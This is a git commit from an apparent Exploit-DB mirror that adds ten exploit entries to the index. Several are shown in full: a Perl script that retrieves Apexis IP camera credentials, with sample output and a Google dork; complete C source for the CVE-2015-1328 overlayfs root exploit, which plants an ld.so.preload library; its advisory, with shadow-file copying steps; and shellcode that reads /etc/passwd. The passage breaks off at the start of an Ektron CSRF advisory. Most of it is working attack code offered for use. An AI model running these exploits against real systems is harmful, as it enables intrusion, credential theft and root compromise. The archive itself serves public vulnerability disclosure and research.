DB: 2015-06-17
10 new exploits
This commit is contained in:
parent
961bfe01be
commit
f6c02117f7
11 changed files with 1081 additions and 1 deletions
11
files.csv
11
files.csv
|
@ -33625,7 +33625,11 @@ id,file,description,date,author,platform,type,port
|
||||||
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
|
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
|
||||||
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
|
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
|
||||||
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
|
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
|
||||||
37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
|
37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
|
||||||
|
37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
|
||||||
|
37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
|
||||||
|
37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80
|
||||||
|
37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0
|
||||||
37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
|
37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
|
||||||
37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
|
37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
|
||||||
37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
|
37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
|
||||||
|
@ -33637,6 +33641,7 @@ id,file,description,date,author,platform,type,port
|
||||||
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
|
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
|
||||||
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||||
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||||
|
37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,%rebel%,linux,local,0
|
||||||
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
|
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
|
||||||
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
|
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
|
||||||
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
|
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
|
||||||
|
@ -33650,5 +33655,9 @@ id,file,description,date,author,platform,type,port
|
||||||
37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||||
37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
|
37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
|
||||||
37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
|
37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
|
||||||
|
37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
|
||||||
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
|
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
|
||||||
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
|
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
|
||||||
|
37293,platforms/linux/local/37293.txt,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File)",2015-06-16,%rebel%,linux,local,0
|
||||||
|
37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF Vulnerability",2015-06-16,"Jerold Hoong",php,webapps,0
|
||||||
|
37297,platforms/linux/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader (58 bytes)",2015-06-16,B3mB4m,linux,shellcode,0
|
||||||
|
|
Can't render this file because it is too large.
|
147
platforms/hardware/webapps/37298.txt
Executable file
147
platforms/hardware/webapps/37298.txt
Executable file
|
@ -0,0 +1,147 @@
|
||||||
|
*# Exploit Title: Apexis IP CAM - Full Info Disclosure **
|
||||||
|
**# Google Dork: inurl:"get_status.cgi"cgi-bin/**
|
||||||
|
**# Date: 01/06/2015**
|
||||||
|
**# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE
|
||||||
|
Remoteexecution.net**
|
||||||
|
**# Vendor Homepage: http://www.apexis.com.cn/**
|
||||||
|
**# Tested on: Linux**
|
||||||
|
*
|
||||||
|
*Models Afected :**
|
||||||
|
**
|
||||||
|
**APM-H602-MPC**
|
||||||
|
**APM-H803-MPC**
|
||||||
|
**APM-H901-MPC**
|
||||||
|
**APM-H501-MPC**
|
||||||
|
**APM-H403-MPC**
|
||||||
|
**APM-H804*
|
||||||
|
|
||||||
|
_*
|
||||||
|
*__*Usage: please enter the url ipcam Example : *_
|
||||||
|
|
||||||
|
http://server/cgi-bin/get_status.cgi o
|
||||||
|
http://server/cgi-bin/get_tutk_account.cgi
|
||||||
|
|
||||||
|
_*You get something like this*__*:*_
|
||||||
|
|
||||||
|
[Sunplace@solutions ]$ perl xploit.pl
|
||||||
|
[ Apexis IP CAM - Full Info Disclosure ]
|
||||||
|
[ Discovery by: Sunplace Solutions ]
|
||||||
|
[ Exploit: Sunplace Solutions - Daniel Godoy ]
|
||||||
|
[ Greetz: www.remoteexecution.net - ]
|
||||||
|
URL: http://server/cgi-bin/get_tutk_account.cgi
|
||||||
|
|
||||||
|
[x]Trying to pwn =>/get_tutk_account.cgi
|
||||||
|
Result:
|
||||||
|
tutk_result=1;
|
||||||
|
tutk_guid='FBX9937PJG273MPMMRZJ';
|
||||||
|
tutk_user='admin';
|
||||||
|
tutk_pwd='lolo2502';
|
||||||
|
|
||||||
|
[x]Trying to pwn => /get_tutk_account
|
||||||
|
Result:
|
||||||
|
tutk_result=1;
|
||||||
|
tutk_guid='FBX9937PJG273MPMMRZJ';
|
||||||
|
tutk_user='admin';
|
||||||
|
tutk_pwd='lolo2502';
|
||||||
|
|
||||||
|
[x]Trying to pwn => /get_extra_server.cgi
|
||||||
|
Result:
|
||||||
|
extraserv_result=1;
|
||||||
|
server_enable=0;
|
||||||
|
server_ipaddr='192.168.1.220';
|
||||||
|
server_port=6666;
|
||||||
|
server_time=10;
|
||||||
|
|
||||||
|
|
||||||
|
_*Index of /cgi-bin/ example:*_
|
||||||
|
|
||||||
|
backup_params.cgi
|
||||||
|
check_user.cgi
|
||||||
|
clear_log.cgi
|
||||||
|
control_cruise.cgi
|
||||||
|
decoder_control.cgi
|
||||||
|
delete_sdcard_file.cgi
|
||||||
|
download_sdcard_file.cgi
|
||||||
|
format_sdc.cgi
|
||||||
|
get_alarm_schedule.cgi
|
||||||
|
get_camera_vars.cgi
|
||||||
|
get_cruise.cgi
|
||||||
|
get_extra_server.cgi
|
||||||
|
get_list_cruise.cgi
|
||||||
|
get_log_info.cgi
|
||||||
|
get_log_page.cgi
|
||||||
|
get_maintain.cgi
|
||||||
|
get_motion_schedule.cgi
|
||||||
|
get_params.cgi
|
||||||
|
get_preset_status.cgi
|
||||||
|
get_real_status.cgi
|
||||||
|
get_sdc_status.cgi
|
||||||
|
get_status.cgi
|
||||||
|
get_sycc_account.cgi
|
||||||
|
get_tutk_account.cgi
|
||||||
|
get_wifi_scan_result.cgi
|
||||||
|
mobile_snapshot.cgi
|
||||||
|
reboot.cgi
|
||||||
|
|
||||||
|
And more......
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
_*[Exploit Code]*__*
|
||||||
|
*_
|
||||||
|
#!/usr/bin/perl
|
||||||
|
print "[ Apexis IP CAM - Full Info Disclosure ]\n";
|
||||||
|
print "[ Discovery by: Sunplace Solutions ]\n";
|
||||||
|
print "[ Exploit: Sunplace Solutions ]\n";
|
||||||
|
print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n";
|
||||||
|
print "URL: ";
|
||||||
|
$url=<STDIN>;
|
||||||
|
use LWP::UserAgent;
|
||||||
|
my $ua = LWP::UserAgent->new;
|
||||||
|
|
||||||
|
$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)');
|
||||||
|
|
||||||
|
chop($url);
|
||||||
|
if ($url eq "")
|
||||||
|
{
|
||||||
|
print 'URL dont empty!.'."\n";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$www = new LWP::UserAgent;
|
||||||
|
@path=split(/cgi-bin/,$url);
|
||||||
|
$content = $www->get($url) or error();
|
||||||
|
print "\n[x]Trying to pwn =>".$path[1]."\n";
|
||||||
|
print "Result: \n";
|
||||||
|
|
||||||
|
$pwn = $content->content;
|
||||||
|
$pwn=~ s/var//g;
|
||||||
|
$pwn=~ s/ //g;
|
||||||
|
$pwn=~ s/ret_//g;
|
||||||
|
print $pwn;
|
||||||
|
|
||||||
|
print "\n[x]Trying to pwn => /get_tutk_account\n";
|
||||||
|
print "Result: \n";
|
||||||
|
$content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or
|
||||||
|
error();
|
||||||
|
$pwn = $content->content;
|
||||||
|
$pwn=~ s/var//g;
|
||||||
|
$pwn=~ s/ret_//g;
|
||||||
|
$pwn=~ s/ //g;
|
||||||
|
|
||||||
|
print $pwn;
|
||||||
|
|
||||||
|
print "\n[x]Trying to pwn => /get_extra_server.cgi\n";
|
||||||
|
print "Result: \n";
|
||||||
|
$content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or
|
||||||
|
error();
|
||||||
|
$pwn = $content->content;
|
||||||
|
$pwn=~ s/var//g;
|
||||||
|
$pwn=~ s/ret_//g;
|
||||||
|
$pwn=~ s/extra_//g;
|
||||||
|
$pwn=~ s/ //g;
|
||||||
|
print $pwn;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
153
platforms/linux/local/37292.c
Executable file
153
platforms/linux/local/37292.c
Executable file
|
@ -0,0 +1,153 @@
|
||||||
|
/*
|
||||||
|
# Exploit Title: ofs.c - overlayfs local root in ubuntu
|
||||||
|
# Date: 2015-06-15
|
||||||
|
# Exploit Author: rebel
|
||||||
|
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
|
||||||
|
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
|
||||||
|
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
|
||||||
|
|
||||||
|
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||||
|
CVE-2015-1328 / ofs.c
|
||||||
|
overlayfs incorrect permission handling + FS_USERNS_MOUNT
|
||||||
|
|
||||||
|
user@ubuntu-server-1504:~$ uname -a
|
||||||
|
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
|
||||||
|
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
|
||||||
|
user@ubuntu-server-1504:~$ id
|
||||||
|
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
|
||||||
|
user@ubuntu-server-1504:~$ ./ofs
|
||||||
|
spawning threads
|
||||||
|
mount #1
|
||||||
|
mount #2
|
||||||
|
child threads done
|
||||||
|
/etc/ld.so.preload created
|
||||||
|
creating shared library
|
||||||
|
# id
|
||||||
|
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
|
||||||
|
|
||||||
|
greets to beist & kaliman
|
||||||
|
2015-05-24
|
||||||
|
%rebel%
|
||||||
|
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <sched.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/mount.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <sched.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/mount.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <signal.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <linux/sched.h>
|
||||||
|
|
||||||
|
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
|
||||||
|
|
||||||
|
static char child_stack[1024*1024];
|
||||||
|
|
||||||
|
static int
|
||||||
|
child_exec(void *stuff)
|
||||||
|
{
|
||||||
|
char *file;
|
||||||
|
system("rm -rf /tmp/ns_sploit");
|
||||||
|
mkdir("/tmp/ns_sploit", 0777);
|
||||||
|
mkdir("/tmp/ns_sploit/work", 0777);
|
||||||
|
mkdir("/tmp/ns_sploit/upper",0777);
|
||||||
|
mkdir("/tmp/ns_sploit/o",0777);
|
||||||
|
|
||||||
|
fprintf(stderr,"mount #1\n");
|
||||||
|
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
|
||||||
|
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
|
||||||
|
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
|
||||||
|
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
|
||||||
|
exit(-1);
|
||||||
|
}
|
||||||
|
file = ".access";
|
||||||
|
chmod("/tmp/ns_sploit/work/work",0777);
|
||||||
|
} else file = "ns_last_pid";
|
||||||
|
|
||||||
|
chdir("/tmp/ns_sploit/o");
|
||||||
|
rename(file,"ld.so.preload");
|
||||||
|
|
||||||
|
chdir("/");
|
||||||
|
umount("/tmp/ns_sploit/o");
|
||||||
|
fprintf(stderr,"mount #2\n");
|
||||||
|
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
|
||||||
|
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
|
||||||
|
exit(-1);
|
||||||
|
}
|
||||||
|
chmod("/tmp/ns_sploit/work/work",0777);
|
||||||
|
}
|
||||||
|
|
||||||
|
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
|
||||||
|
umount("/tmp/ns_sploit/o");
|
||||||
|
}
|
||||||
|
|
||||||
|
int
|
||||||
|
main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
int status, fd, lib;
|
||||||
|
pid_t wrapper, init;
|
||||||
|
int clone_flags = CLONE_NEWNS | SIGCHLD;
|
||||||
|
|
||||||
|
fprintf(stderr,"spawning threads\n");
|
||||||
|
|
||||||
|
if((wrapper = fork()) == 0) {
|
||||||
|
if(unshare(CLONE_NEWUSER) != 0)
|
||||||
|
fprintf(stderr, "failed to create new user namespace\n");
|
||||||
|
|
||||||
|
if((init = fork()) == 0) {
|
||||||
|
pid_t pid =
|
||||||
|
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
|
||||||
|
if(pid < 0) {
|
||||||
|
fprintf(stderr, "failed to create new mount namespace\n");
|
||||||
|
exit(-1);
|
||||||
|
}
|
||||||
|
|
||||||
|
waitpid(pid, &status, 0);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
waitpid(init, &status, 0);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
usleep(300000);
|
||||||
|
|
||||||
|
wait(NULL);
|
||||||
|
|
||||||
|
fprintf(stderr,"child threads done\n");
|
||||||
|
|
||||||
|
fd = open("/etc/ld.so.preload",O_WRONLY);
|
||||||
|
|
||||||
|
if(fd == -1) {
|
||||||
|
fprintf(stderr,"exploit failed\n");
|
||||||
|
exit(-1);
|
||||||
|
}
|
||||||
|
|
||||||
|
fprintf(stderr,"/etc/ld.so.preload created\n");
|
||||||
|
fprintf(stderr,"creating shared library\n");
|
||||||
|
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
|
||||||
|
write(lib,LIB,strlen(LIB));
|
||||||
|
close(lib);
|
||||||
|
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
|
||||||
|
if(lib != 0) {
|
||||||
|
fprintf(stderr,"couldn't create dynamic library\n");
|
||||||
|
exit(-1);
|
||||||
|
}
|
||||||
|
write(fd,"/tmp/ofs-lib.so\n",16);
|
||||||
|
close(fd);
|
||||||
|
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
|
||||||
|
execl("/bin/su","su",NULL);
|
||||||
|
}
|
||||||
|
|
97
platforms/linux/local/37293.txt
Executable file
97
platforms/linux/local/37293.txt
Executable file
|
@ -0,0 +1,97 @@
|
||||||
|
The overlayfs filesystem does not correctly check file permissions when
|
||||||
|
creating new files in the upper filesystem directory. This can be exploited
|
||||||
|
by an unprivileged process in kernels with CONFIG_USER_NS=y and where
|
||||||
|
overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs
|
||||||
|
inside unprivileged mount namespaces. This is the default configuration of
|
||||||
|
Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].
|
||||||
|
|
||||||
|
If you don't want to update your kernel and you don't use overlayfs, a viable
|
||||||
|
workaround is to just remove or blacklist overlayfs.ko / overlay.ko.
|
||||||
|
|
||||||
|
Details
|
||||||
|
================================
|
||||||
|
|
||||||
|
>From Documentation/filesystems/overlayfs.txt [2]:
|
||||||
|
|
||||||
|
"Objects that are not directories (files, symlinks, device-special
|
||||||
|
files etc.) are presented either from the upper or lower filesystem as
|
||||||
|
appropriate. When a file in the lower filesystem is accessed in a way
|
||||||
|
the requires write-access, such as opening for write access, changing
|
||||||
|
some metadata etc., the file is first copied from the lower filesystem
|
||||||
|
to the upper filesystem (copy_up)."
|
||||||
|
|
||||||
|
The ovl_copy_up_* functions do not correctly check that the user has
|
||||||
|
permission to write files to the upperdir directory. The only permissions
|
||||||
|
that are checked is if the owner of the file that is being modified has
|
||||||
|
permission to write to the upperdir. Furthermore, when a file is copied from
|
||||||
|
the lowerdir the file metadata is carbon copied, instead of attributes such as
|
||||||
|
owner being changed to the user that triggered the copy_up_* procedures.
|
||||||
|
|
||||||
|
Example of creating a 1:1 copy of a root-owned file:
|
||||||
|
|
||||||
|
(Note that the workdir= option is not needed on older kernels)
|
||||||
|
|
||||||
|
user@...ntu-server-1504:~$ ./create-namespace
|
||||||
|
root@...ntu-server-1504:~# mount -t overlay -o
|
||||||
|
lowerdir=/etc,upperdir=upper,workdir=work overlayfs o
|
||||||
|
root@...ntu-server-1504:~# chmod 777 work/work/
|
||||||
|
root@...ntu-server-1504:~# cd o
|
||||||
|
root@...ntu-server-1504:~/o# mv shadow copy_of_shadow
|
||||||
|
(exit the namespace)
|
||||||
|
user@...ntu-server-1504:~$ ls -al upper/copy_of_shadow
|
||||||
|
-rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow
|
||||||
|
user@...ntu-server-1504:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode
|
||||||
|
Device: 801h/2049d Inode: 939791 Links: 1
|
||||||
|
Device: 801h/2049d Inode: 277668 Links: 1
|
||||||
|
|
||||||
|
Now we can place this file in /etc by switching "upper" to be the lowerdir
|
||||||
|
option, the permission checks pass since the file is owned by root and root
|
||||||
|
can write to /etc.
|
||||||
|
|
||||||
|
user@...ntu-server-1504:~$ ./create-namespace
|
||||||
|
root@...ntu-server-1504:~# mount -t overlay -o
|
||||||
|
lowerdir=upper,upperdir=/etc,workdir=work overlayfs o
|
||||||
|
root@...ntu-server-1504:~# chmod 777 work/work/
|
||||||
|
root@...ntu-server-1504:~# cd o
|
||||||
|
root@...ntu-server-1504:~/o# chmod 777 copy_of_shadow
|
||||||
|
root@...ntu-server-1504:~/o# exit
|
||||||
|
user@...ntu-server-1504:~$ ls -al /etc/copy_of_shadow
|
||||||
|
-rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow
|
||||||
|
|
||||||
|
The attached exploit gives a root shell by creating a world-writable
|
||||||
|
/etc/ld.so.preload file. The exploit has been tested on the most recent
|
||||||
|
kernels before 2015-06-15 on Ubuntu 12.04, 14.04, 14.10 and 15.04.
|
||||||
|
|
||||||
|
It is also possible to list directory contents for any directory on the system
|
||||||
|
regardless of permissions:
|
||||||
|
|
||||||
|
nobody@...ntu-server-1504:~$ ls -al /root
|
||||||
|
ls: cannot open directory /root: Permission denied
|
||||||
|
nobody@...ntu-server-1504:~$ mkdir o upper work
|
||||||
|
nobody@...ntu-server-1504:~$ mount -t overlayfs -o
|
||||||
|
lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work
|
||||||
|
overlayfs /home/user/o
|
||||||
|
nobody@...ntu-server-1504:~$ ls -al o 2>/dev/null
|
||||||
|
total 8
|
||||||
|
drwxrwxr-x 1 root nogroup 4096 May 24 16:33 .
|
||||||
|
drwxr-xr-x 8 root nogroup 4096 May 24 16:33 ..
|
||||||
|
-????????? ? ? ? ? ? .bash_history
|
||||||
|
-????????? ? ? ? ? ? .bashrc
|
||||||
|
d????????? ? ? ? ? ? .cache
|
||||||
|
-????????? ? ? ? ? ? .lesshst
|
||||||
|
d????????? ? ? ? ? ? linux-3.19.0
|
||||||
|
|
||||||
|
|
||||||
|
Credit
|
||||||
|
================================
|
||||||
|
Philip Pettersson, Samsung SDS Security Center
|
||||||
|
|
||||||
|
References
|
||||||
|
================================
|
||||||
|
[1] https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549
|
||||||
|
[2] https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt
|
||||||
|
[3] http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## EDB Note: Exploit Mirror - https://www.exploit-db.com/exploits/37292/
|
51
platforms/linux/shellcode/37297.txt
Executable file
51
platforms/linux/shellcode/37297.txt
Executable file
|
@ -0,0 +1,51 @@
|
||||||
|
Linux/x86 - /etc/passwd Reader - 58 bytes
|
||||||
|
|
||||||
|
#Greetz : Bomberman(Leader),wiremask.eu
|
||||||
|
#Author : B3mB4m
|
||||||
|
#Concat : Do not disturb - Bomberman
|
||||||
|
#Bu adamı geçmeden konuşmaya iznim yok.Iki yıl sonra görüşmek üzre :)
|
||||||
|
|
||||||
|
#Info
|
||||||
|
#File descriptor on EBX
|
||||||
|
#Buffer on ECX
|
||||||
|
#Bytes to read on EDX
|
||||||
|
|
||||||
|
|
||||||
|
Disassembly of section .text:
|
||||||
|
|
||||||
|
08048060 <.text>:
|
||||||
|
8048060: 31 c9 xor %ecx,%ecx
|
||||||
|
8048062: 31 c0 xor %eax,%eax
|
||||||
|
8048064: 31 d2 xor %edx,%edx
|
||||||
|
8048066: 51 push %ecx
|
||||||
|
8048067: b0 05 mov $0x5,%al
|
||||||
|
8048069: 68 73 73 77 64 push $0x64777373
|
||||||
|
804806e: 68 63 2f 70 61 push $0x61702f63
|
||||||
|
8048073: 68 2f 2f 65 74 push $0x74652f2f
|
||||||
|
8048078: 89 e3 mov %esp,%ebx
|
||||||
|
804807a: cd 80 int $0x80
|
||||||
|
804807c: 89 d9 mov %ebx,%ecx
|
||||||
|
804807e: 89 c3 mov %eax,%ebx
|
||||||
|
8048080: b0 03 mov $0x3,%al
|
||||||
|
8048082: 66 ba ff 0f mov $0xfff,%dx
|
||||||
|
8048086: 66 42 inc %dx
|
||||||
|
8048088: cd 80 int $0x80
|
||||||
|
804808a: 31 c0 xor %eax,%eax
|
||||||
|
804808c: 31 db xor %ebx,%ebx
|
||||||
|
804808e: b3 01 mov $0x1,%bl
|
||||||
|
8048090: b0 04 mov $0x4,%al
|
||||||
|
8048092: cd 80 int $0x80
|
||||||
|
8048094: 31 c0 xor %eax,%eax
|
||||||
|
8048096: b0 01 mov $0x1,%al
|
||||||
|
8048098: cd 80 int $0x80
|
||||||
|
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
char *shellcode =
|
||||||
|
"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
|
||||||
|
|
||||||
|
int main(void){
|
||||||
|
fprintf(stdout,"Length: %d\n",strlen(shellcode));
|
||||||
|
(*(void(*)()) shellcode)();}
|
36
platforms/php/webapps/37296.txt
Executable file
36
platforms/php/webapps/37296.txt
Executable file
|
@ -0,0 +1,36 @@
|
||||||
|
# Vulnerability type: Cross-site Request Forgery
|
||||||
|
# Vendor: http://www.ektron.com/
|
||||||
|
# Product: Ektron Content Management System
|
||||||
|
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.114)
|
||||||
|
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.120)
|
||||||
|
